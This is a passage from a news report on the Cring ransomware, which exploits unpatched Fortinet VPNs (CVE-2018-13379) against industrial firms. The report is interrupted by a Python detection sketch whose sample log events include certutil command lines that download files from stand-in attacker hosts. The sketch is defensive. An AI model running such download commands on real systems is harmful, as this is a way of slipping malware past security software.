A vulnerability affecting Fortinet VPNs is being exploited by a new human-operated strain of ransomware called Cring to breach and encrypt industrial sector networks.
The Cring operators drop custom Mimikatz samples, followed by Cobalt Strike, after first gaining access, and deploy the ransomware payload by downloading it with the legitimate Windows CertUtil certificate manager to bypass security software.
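A detection sketch for the CertUtil download step described above, added here as an example and not taken from the Kaspersky report. The page does not give the command line the operators used, so the event fields, host names and sample command lines below are constructed, and the check assumes process-creation logs that record the full command line.

```python
import re

# certutil switches that can fetch remote content (real certutil options).
DOWNLOAD_SWITCHES = {"urlcache", "verifyctl"}
# certutil as the program name, bare or at the end of a (possibly quoted) path.
IMAGE_RE = re.compile(r"(?:^|[\\/\"\s])certutil(?:\.exe)?(?=[\"\s]|$)", re.IGNORECASE)
# Switches may be written with '-' or '/', in any letter case.
SWITCH_RE = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)")
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)

def is_certutil_download(command_line: str) -> bool:
    """True when certutil runs with a download-capable switch and a URL."""
    if not IMAGE_RE.search(command_line):
        return False
    switches = {s.lower() for s in SWITCH_RE.findall(command_line)}
    return bool(switches & DOWNLOAD_SWITCHES) and bool(URL_RE.search(command_line))

def scan(events):
    """Return the events whose command line looks like a certutil download."""
    return [e for e in events if is_certutil_download(e["cmd"])]

# Constructed sample process-creation events (hypothetical hosts and URLs).
SAMPLE_EVENTS = [
    {"host": "hmi-01", "cmd": r"certutil.exe -urlcache -split -f "
                              r"http://payload.example.test/a.txt C:\Users\Public\a.txt"},
    {"host": "eng-02", "cmd": r'"C:\Windows\System32\certutil.exe" /URLCache /f '
                              r"https://192.0.2.10/x.bin x.bin"},
    # Benign: hashing a local file.
    {"host": "eng-03", "cmd": r"certutil.exe -hashfile C:\Temp\setup.exe SHA256"},
    {"host": "srv-04", "cmd": "certutil -verifyctl -f -split "
                              "http://payload.example.test/b.dat"},
    # Benign: certutil only appears inside a file name argument.
    {"host": "eng-05", "cmd": r"notepad.exe C:\notes\certutil-urlcache-http.txt"},
    # Benign: listing the URL cache, no remote URL given.
    {"host": "eng-06", "cmd": "certutil.exe -urlcache *"},
]

if __name__ == "__main__":
    for event in scan(SAMPLE_EVENTS):
        print(f"ALERT {event['host']}: {event['cmd']}")
```

Matching on the program name misses a renamed copy of certutil.exe, so pair this with a check on the binary's original file name where the log source records it.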
As Kaspersky researchers revealed in a report released today, the attackers exploit Fortigate SSL VPN servers exposed to the Internet that are not patched against the CVE-2018-13379 vulnerability, which allows them to breach their target’s network.
“The victims of these attacks include industrial companies in European countries,” said Kaspersky researchers.
“At least in one case, an attack by …